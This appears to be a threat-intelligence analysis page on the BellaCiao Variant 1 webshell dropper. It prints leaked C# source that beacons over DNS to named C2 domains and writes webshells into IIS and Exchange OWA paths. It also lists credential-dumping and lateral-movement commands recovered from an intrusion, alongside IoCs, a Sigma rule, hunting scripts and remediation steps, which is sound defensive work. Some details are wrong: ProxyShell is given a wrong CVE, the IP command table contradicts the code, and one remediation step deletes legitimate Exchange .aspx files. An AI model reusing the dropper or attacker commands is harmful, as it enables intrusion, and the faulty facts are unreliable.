BellaCiao Variant 1 - C# Webshell Dropper
BellaCiao Variant 1 is a sophisticated C# Windows Service that implements DNS-based command and control with automatic webshell deployment to IIS and Microsoft Exchange server paths.
This page contains analysis of actual malware source code leaked from CharmingKitten’s internal network. The code samples are provided for threat intelligence and defensive purposes only.
Overview
Variant 1 operates as a Windows Service named MicrosoftAgentServices that:
Performs DNS beaconing every 24 hours to C2 domains
Receives IP-encoded commands via DNS responses
Drops base64-encoded webshells to specific file system paths
Maintains persistence through Windows Service installation
Technical Architecture
Windows Service Configuration
The malware is implemented as a .NET Windows Service:
namespace MicrosoftAgentServices
{
    public partial class Service1 : ServiceBase
    {
        public string dnsdomain = ".eposta.maill-support.com";
        public string dnsdomain2 = ".eposta.mailupdate.info";
        public string web = "i am good boy"; // Base64 webshell payload
        Timer workerTime = new Timer();

        protected override void OnStart(string[] args)
        {
            workerTime.Elapsed += new ElapsedEventHandler(this.OnElapsedTime);
            workerTime.Interval = 24 * 3600 * 1000; // 24 hours
            workerTime.Enabled = true;
        }
    }
}
Target Deployment Paths
The malware targets specific IIS and Exchange Server paths:
// IIS wwwroot paths
public string wwwroot = @"c:\inetpub\wwwroot\aspnet_client\";
public string wwwroot2 = @"c:\inetpub\wwwroot\aspnet_client\system_web\";

// Exchange OWA authentication paths
public string webpathexh01 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\";
public string webpathexh02 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\";
public string webpathexh03 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\";

// Webshell filenames
public string[] arrayNames = new string[] {
    "aspnet.aspx",
    "owafont.aspx",
    "themes.aspx",
    "logon.aspx"
};
These paths are specifically chosen to blend in with legitimate Microsoft files and to be accessible via web requests to OWA authentication endpoints.
DNS Beaconing Mechanism
Random Subdomain Generation
The malware generates random subdomains for DNS queries:
private void OnElapsedTime(object value1, ElapsedEventArgs e)
{
    // Generate random string: 2 uppercase + 3 lowercase + "EXH"
    string randstr = RandomString(2, false) + RandomString(3, true);
    this.randomName = randstr;
    // Construct beacon domain: e.g., "ABcdeEXH.eposta.maill-support.com"
    string finalhost = randstr + "EXH" + dnsdomain;
    System.Net.IPHostEntry query = System.Net.Dns.GetHostEntry(finalhost);
    response = query.AddressList[0].ToString();
}

private string RandomString(int size, bool lowerCase)
{
    StringBuilder builder = new StringBuilder(size);
    char offset = lowerCase ? 'a' : 'A';
    const int lettersOffset = 26;
    for (int i = 0; i < size; i++)
    {
        char @char = (char)_random.Next(offset, offset + lettersOffset);
        builder.Append(@char);
    }
    return lowerCase ? builder.ToString().ToLower() : builder.ToString();
}
DNS Query Pattern
Query Pattern: [A-Z]{2}[a-z]{3}EXH.<primary_domain>
Example: ABcdeEXH.eposta.maill-support.com
Fallback: Same pattern with backup domain
Example: ABcdeEXH.eposta.mailupdate.info
The “EXH” marker indicates Exchange Server targeting. This allows operators to distinguish between different deployment types in their C2 infrastructure.
Command Encoding via IP Address
The malware uses DNS A record responses (IP addresses) to encode commands:
if (!String.IsNullOrEmpty(response))
{
    string[] res = response.Split('.');
    // Command: Deploy webshell
    if (res[3] == "58")
    {
        webwrite(response);
    }
    // Command: Remove webshells
    else if (response == "212.175.168.59")
    {
        removeweb();
    }
}
IP-Encoded Command Structure
IP Address Pattern   Command                  Action
*.*.*.58             Deploy webshell          Drop ASPX file to target path
212.175.168.*        Choose IIS path          Last octet determines wwwroot vs wwwroot2
212.176.168.*        Choose Exchange path 1   OWA themes path
212.177.168.*        Choose Exchange path 2   OWA themes resources
212.175.168.59       Remove all webshells     Delete all deployed files
Webshell Deployment Logic
private void webwrite(string response)
{
    string path = string.Empty;
    string[] choosePath = response.Split('.');
    bool isexh = (choosePath[2] == "168"); // Check if Exchange target
    string randName = this.randomName + ".aspx";
    if (isexh)
    {
        // Exchange Server paths
        if (choosePath[1] == "175")
            path = (choosePath[0] == "212") ?
                webpathexh01 + arrayNames[(int)enuFileName.owafont] :
                webpathexh01 + randName;
        else if (choosePath[1] == "176")
            path = (choosePath[0] == "212") ?
                webpathexh02 + arrayNames[(int)enuFileName.themes] :
                webpathexh02 + randName;
        else if (choosePath[1] == "177")
            path = (choosePath[0] == "212") ?
                webpathexh03 + arrayNames[(int)enuFileName.logon] :
                webpathexh03 + randName;
    }
    else
    {
        // IIS paths
        if (choosePath[1] == "175")
            path = (choosePath[0] == "212") ?
                wwwroot + arrayNames[(int)enuFileName.aspnet] :
                wwwroot + randName;
        else if (choosePath[1] == "176")
            path = (choosePath[0] == "212") ?
                wwwroot2 + arrayNames[(int)enuFileName.aspnet] :
                wwwroot2 + randName;
    }
    // Decode and write webshell ("#" and "@" are padding characters stripped before decoding)
    byte[] clearWeb = System.Convert.FromBase64String(web.Replace("#", "").Replace("@", ""));
    System.IO.File.WriteAllBytes(path, clearWeb);
}
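For responders who have passive DNS or resolver logs showing the beacon query and the A record it received, the following added Python example (not part of the leaked source or of this project) reverses the webwrite() branching to predict which file the implant would have written, so the host can be checked for exactly those artifacts. It follows the octet checks in webwrite() as shown above (fourth octet 58 = deploy, third octet 168 = Exchange branch, second octet selects the directory, first octet 212 selects the fixed filename instead of the random one) and recovers the random filename from the 5-character prefix of the beacon label, which the service stores in randomName. The path constants are copied from the source; the sample query/answer pairs are constructed.

```python
# Predict BellaCiao Variant 1 drop paths from observed beacon query/answer pairs.
# Added analysis helper; it only computes paths and never touches the file system.

# Path constants copied from the Variant 1 source.
WWWROOT = "c:\\inetpub\\wwwroot\\aspnet_client\\"
WWWROOT2 = "c:\\inetpub\\wwwroot\\aspnet_client\\system_web\\"
EXCH_CURRENT = ("C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy"
                "\\owa\\auth\\Current\\")
WEBPATHEXH01 = EXCH_CURRENT + "themes\\resources\\"
WEBPATHEXH02 = EXCH_CURRENT + "themes\\"
WEBPATHEXH03 = EXCH_CURRENT

# second octet -> (base directory, fixed filename used when the first octet is 212)
EXCHANGE_BRANCHES = {
    "175": (WEBPATHEXH01, "owafont.aspx"),
    "176": (WEBPATHEXH02, "themes.aspx"),
    "177": (WEBPATHEXH03, "logon.aspx"),
}
IIS_BRANCHES = {
    "175": (WWWROOT, "aspnet.aspx"),
    "176": (WWWROOT2, "aspnet.aspx"),
}
REMOVE_IP = "212.175.168.59"   # hard-coded "remove all webshells" answer


def random_name_from_query(query):
    """The random filename is the 5-char prefix of the beacon label (e.g. 'ABcde' from
    'ABcdeEXH.eposta.maill-support.com'), so it can be recovered from the DNS query."""
    label = query.split(".")[0]
    if len(label) != 8 or not label.endswith("EXH"):
        raise ValueError(f"not a Variant 1 beacon label: {label!r}")
    return label[:5]


def decode_response(query, answer):
    """Map one A-record answer to the implant's action and expected drop path."""
    octets = answer.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 answer: {answer!r}")
    if octets[3] == "58":
        branches = EXCHANGE_BRANCHES if octets[2] == "168" else IIS_BRANCHES
        branch = branches.get(octets[1])
        if branch is None:
            # webwrite() leaves path empty here, so File.WriteAllBytes throws and nothing is dropped.
            return {"action": "deploy", "path": None, "note": "no matching branch; write fails"}
        base, fixed = branch
        name = fixed if octets[0] == "212" else random_name_from_query(query) + ".aspx"
        return {"action": "deploy", "path": base + name, "note": ""}
    if answer == REMOVE_IP:
        return {"action": "remove", "path": None, "note": "removeweb() deletes all dropped files"}
    return {"action": "idle", "path": None, "note": "answer is not a recognised command"}


def expected_files(records):
    """Given (query, answer) pairs, return the set of paths a responder should check."""
    paths = set()
    for query, answer in records:
        result = decode_response(query, answer)
        if result["action"] == "deploy" and result["path"]:
            paths.add(result["path"])
    return paths


if __name__ == "__main__":
    # Constructed sample: two beacons and the answers they received.
    sample = [
        ("ABcdeEXH.eposta.maill-support.com", "212.175.168.58"),
        ("QRxyzEXH.eposta.mailupdate.info", "10.177.168.58"),
    ]
    for p in sorted(expected_files(sample)):
        print("check:", p)
```

A responder can feed this the query/answer pairs pulled from resolver logs for the beaconing host and get back the exact file list to triage, rather than sweeping every .aspx under the Exchange tree.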
Webshell Capabilities
The dropped webshells provide:
File Upload : Upload files to the compromised server
File Download : Exfiltrate files from the server
Command Execution : Execute arbitrary commands on the system
Webshell access is gained via HTTP/HTTPS requests to the OWA or IIS paths where the ASPX files were dropped.
Turkish Foreign Ministry Attack
Variant 1 was used in the confirmed attack against Turkey’s Ministry of Foreign Affairs:
Attack Timeline
Initial Access: ProxyShell exploitation (CVE-2024-1709)
Service Installation: BellaCiao deployed as Windows Service
DNS Beaconing: Queries to *.eposta.maill-support.com
Webshell Drop: ASPX file deployed to Exchange OWA path
Lateral Movement: Network enumeration and credential harvesting
Persistence: Multiple webshells across different paths
Recovered Commands
# Network reconnaissance
net user /domain
net group "Domain Admins" /domain
nltest /dclist:
# Credential access
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# Lateral movement
net use \\10.20.1.5\c$ /user:Admin1@MFA <password>
IoCs from Attack
Domains Queried:
*.eposta.maill-support.com
Files Created:
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
Service Installed:
Name: MicrosoftAgentServices
Display Name: Microsoft Agent Services
Compromised Accounts:
Admin1@MFA
pfsenselondra@MFA
See Episode 3 Intelligence for full attack analysis.
Indicators of Compromise
File System IoCs
# Exchange Server paths
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
# IIS paths
C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx
# Random named files matching pattern
C:\inetpub\wwwroot\aspnet_client\[A-Z]{2}[a-z]{3}.aspx
Network IoCs
DNS Queries:
[A-Z]{2}[a-z]{3}EXH.eposta.maill-support.com
[A-Z]{2}[a-z]{3}EXH.eposta.mailupdate.info
Domains:
eposta.maill-support.com
eposta.mailupdate.info
Windows Service IoCs
Service Name: MicrosoftAgentServices
Namespace: MicrosoftAgentServices
Timer Interval: 86400000 ms (24 hours)
Detection Strategies
Monitor for suspicious DNS patterns:
# DNS query pattern
^[A-Z]{2}[a-z]{3}EXH\.(eposta\.maill-support\.com|eposta\.mailupdate\.info)$
Detection logic:
Alert on queries to *.eposta.maill-support.com or *.eposta.mailupdate.info
Flag subdomains matching [A-Z]{2}[a-z]{3}EXH pattern
Monitor DNS query frequency (24-hour intervals)
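The three detection rules above (alert on the C2 domains, flag the beacon subdomain pattern, watch for the 24-hour cadence) can be run together over resolver logs. The following Python example is added here and is not part of the page's source or of this project; it assumes a simple whitespace-separated log format of "timestamp client query answer", and the log lines are constructed. It uses the regex from this section unchanged, treats any other name under the two C2 domains as a lower-confidence hit, and derives the interval check from the 86400000 ms timer in the service (a 15-minute tolerance is an assumption to absorb service restarts and clock drift).

```python
# Detect BellaCiao Variant 1 DNS beaconing in a resolver log (added example).
import re
from collections import defaultdict
from datetime import datetime, timezone

# Regex from the Detection Strategies section of this page.
BEACON_RE = re.compile(
    r"^[A-Z]{2}[a-z]{3}EXH\.(eposta\.maill-support\.com|eposta\.mailupdate\.info)$"
)
C2_DOMAINS = ("eposta.maill-support.com", "eposta.mailupdate.info")
BEACON_PERIOD_S = 24 * 3600      # timer interval in the malware source (86400000 ms)
TOLERANCE_S = 15 * 60            # assumed slack for restarts / clock drift

# Constructed sample log: "<ISO-8601 time> <client> <query> <answer>".
SAMPLE_LOG = """\
2025-01-01T03:14:07Z 10.20.1.40 ABcdeEXH.eposta.maill-support.com 212.175.168.58
2025-01-01T03:14:09Z 10.20.1.40 www.microsoft.com 20.70.246.20
2025-01-02T03:14:08Z 10.20.1.40 QRxyzEXH.eposta.mailupdate.info 212.175.168.59
2025-01-02T09:00:00Z 10.20.1.41 update.eposta.maill-support.com 203.0.113.7
2025-01-02T09:00:01Z 10.20.1.41 abcdeEXH.eposta.maill-support.com 203.0.113.7
"""


def parse_line(line):
    ts, client, query, answer = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, client, query.rstrip("."), answer


def classify(query):
    """'beacon' for an exact Variant 1 pattern match, 'c2-domain' for any other name
    under a known C2 domain, None otherwise. The pattern check is case-sensitive on
    purpose: the implant always emits 2 upper + 3 lower letters."""
    if BEACON_RE.match(query):
        return "beacon"
    q = query.lower()
    if any(q == d or q.endswith("." + d) for d in C2_DOMAINS):
        return "c2-domain"
    return None


def find_hits(log_text):
    """Return every log entry that touches the C2 infrastructure, tagged by confidence."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, client, query, answer = parse_line(line)
        kind = classify(query)
        if kind:
            hits.append({"time": when, "client": client, "query": query,
                         "answer": answer, "kind": kind})
    return hits


def periodic_clients(hits):
    """Clients whose consecutive beacon queries are ~24 h apart, with the gaps seen."""
    by_client = defaultdict(list)
    for h in hits:
        if h["kind"] == "beacon":
            by_client[h["client"]].append(h["time"])
    flagged = {}
    for client, times in by_client.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        periodic = [g for g in gaps if abs(g - BEACON_PERIOD_S) <= TOLERANCE_S]
        if periodic:
            flagged[client] = periodic
    return flagged


if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time'].isoformat()} {h['client']} {h['kind']:10} {h['query']} -> {h['answer']}")
    print("periodic beaconing:", periodic_clients(hits))
```

Note that the two hits from 10.20.1.41 are domain-only matches (one is not a beacon label, the other has the wrong letter case), so a rule keyed solely on the subdomain regex would miss them; alerting on the domain itself and reserving the regex for severity is the safer combination.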
Search for unauthorized ASPX files:
# PowerShell search
Get-ChildItem -Path "C:\inetpub\wwwroot\aspnet_client" -Filter *.aspx -Recurse
Get-ChildItem -Path "C:\Program Files\Microsoft\Exchange Server" -Filter *.aspx -Recurse |
    Where-Object { $_.FullName -like "*\owa\auth\Current\*" }
Look for:
Unexpected ASPX files in wwwroot\aspnet_client
New files in Exchange OWA authentication paths
Files matching random naming pattern [A-Z]{2}[a-z]{3}.aspx
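The "Look for" list above amounts to three filename checks. The following Python example is added here (it is not part of the page or of this project) and implements them as a portable hunt that can run from a mounted forensic image or an exported directory tree: it walks a root, flags every .aspx file, and classifies each as a known BellaCiao filename, a random-pattern name, or some other .aspx worth a manual look. The demo tree it builds is constructed in a temporary directory with placeholder file contents.

```python
# Hunt a directory tree for BellaCiao Variant 1 webshell artifacts (added example).
import os
import re
import shutil
import tempfile

# Fixed filenames from the implant's arrayNames array.
KNOWN_NAMES = {"aspnet.aspx", "owafont.aspx", "themes.aspx", "logon.aspx"}
# Random-name pattern: 2 upper + 3 lower letters, as generated by RandomString().
RANDOM_NAME_RE = re.compile(r"^[A-Z]{2}[a-z]{3}\.aspx$")


def classify_name(name):
    """Return a finding category for a filename, or None if it is not an .aspx file."""
    if name in KNOWN_NAMES:
        return "known-bellaciao-name"
    if RANDOM_NAME_RE.match(name):
        return "random-name-pattern"
    if name.lower().endswith(".aspx"):
        return "other-aspx"
    return None


def hunt(root):
    """Walk root and return sorted findings for every .aspx file under it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            kind = classify_name(name)
            if kind is None:
                continue
            full = os.path.join(dirpath, name)
            findings.append({"path": full, "kind": kind,
                             "size": os.path.getsize(full),
                             "mtime": os.path.getmtime(full)})
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree():
    """Create a constructed directory layout mimicking the IoC paths; returns its root."""
    root = tempfile.mkdtemp(prefix="bellaciao-hunt-")
    layout = {
        "inetpub/wwwroot/aspnet_client/aspnet.aspx": "placeholder",
        "inetpub/wwwroot/aspnet_client/system_web/QRxyz.aspx": "placeholder",
        "inetpub/wwwroot/aspnet_client/system_web/4_0_30319/WebForms.js": "// placeholder",
        "Exchange Server/V15/FrontEnd/HttpProxy/owa/auth/Current/themes/resources/owafont.aspx": "placeholder",
        "Exchange Server/V15/FrontEnd/HttpProxy/owa/auth/Current/logon.aspx": "placeholder",
        "Exchange Server/V15/FrontEnd/HttpProxy/owa/auth/Current/custom.aspx": "placeholder",
    }
    for rel, content in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


def remove_demo_tree(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    demo = build_demo_tree()
    try:
        for f in hunt(demo):
            print(f"{f['kind']:22} {os.path.relpath(f['path'], demo)}")
    finally:
        remove_demo_tree(demo)
```

Run against a real system, point hunt() at the wwwroot and Exchange FrontEnd roots and review every "other-aspx" finding as well: the operator can rename the fixed filenames in a rebuilt sample, so the directory a file sits in is as strong a signal as its name.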
Windows Service Detection
Identify suspicious services:
# List services with "Microsoft" in name but not from Microsoft
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.Name -like "*Microsoft*" -and $_.PathName -notlike "*\Windows\*" }
# Check for MicrosoftAgentServices specifically
Get-Service -Name "MicrosoftAgentServices" -ErrorAction SilentlyContinue
Sigma Rule
title: BellaCiao Variant 1 DNS Beaconing
status: experimental
description: Detects DNS queries matching BellaCiao Variant 1 C2 pattern
author: CharmingKitten Exposure Project
date: 2025/01/01
logsource:
    product: dns
detection:
    selection:
        query|re: '^[A-Z]{2}[a-z]{3}EXH\.(eposta\.maill-support\.com|eposta\.mailupdate\.info)$'
    condition: selection
falsepositives:
    - Unknown
level: critical
Remediation Steps
Isolate the system
Immediately disconnect the compromised server from the network to prevent further C2 communication and lateral movement.
Stop the service
Stop-Service -Name "MicrosoftAgentServices" -Force
Set-Service -Name "MicrosoftAgentServices" -StartupType Disabled
Remove webshells
# Remove IIS webshells
Remove-Item "C:\inetpub\wwwroot\aspnet_client\*.aspx" -Force
# Remove Exchange webshells
$owaPath = "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current"
Get-ChildItem -Path $owaPath -Filter *.aspx -Recurse | Remove-Item -Force
Uninstall the service
sc delete MicrosoftAgentServices
Block C2 domains
Add DNS blocking or firewall rules for:
eposta.maill-support.com
eposta.mailupdate.info
All subdomains under these domains
Hunt for persistence
Search for additional persistence mechanisms:
Scheduled tasks
Registry run keys
Other services
Additional webshells
Reset credentials
Reset passwords for all accounts that may have been compromised, especially:
Domain administrator accounts
Exchange administrator accounts
Service accounts